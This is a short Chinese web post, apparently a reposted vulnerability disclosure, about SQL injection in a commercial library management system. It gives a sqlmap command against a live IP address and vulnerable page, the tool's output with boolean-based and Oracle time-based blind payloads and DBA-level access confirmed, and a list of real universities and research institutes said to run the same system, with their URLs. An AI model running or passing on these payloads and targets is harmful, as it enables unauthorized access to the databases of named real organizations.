图书管理系统mysql语句_某通用图书馆管理系统SQL注入_MySQL

某通用图书馆管理系统SQL注入，主要是某个某页面存在SQL注射。sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dba

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: ID

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: ID=123 AND 7478=7478

Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: ID=123 AND 9273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(111)||CHR(105)||CHR(98),5)

---

[11:34:18] [INFO] the back-end DBMS is Oracle

web server operating system: Windows 2008 R2 or 7

web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727

back-end DBMS: Oracle

[11:34:18] [INFO] testing if current user is DBA

current user is DBA: True

[11:34:25] [INFO] fetched data logged to text files under '/Users/Leek/Desktop/sqlmap-dev/output/219.242.65.10'

DBA==True

在它的客户名单里测试了几个，

国家图书馆中央社会主义分馆:http://www.zysylib.org.cn/

中国科学院物理研究所:http://libiop.iphy.ac.cn/

中国科学院软研所:http://124.16.136.160:8083/iscas_lib/

还有各种大学用户，

中国矿业大学:http://219.242.65.10/fsweb/Default.aspx

华东交通大学:http://lib.ecjtu.jx.cn:80/gdweb

华北科技学院:http://211.81.174.140/

本条技术文章来源于互联网，如果无意侵犯您的权益请点击此处反馈版权投诉

本文系统来源：php中文网

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！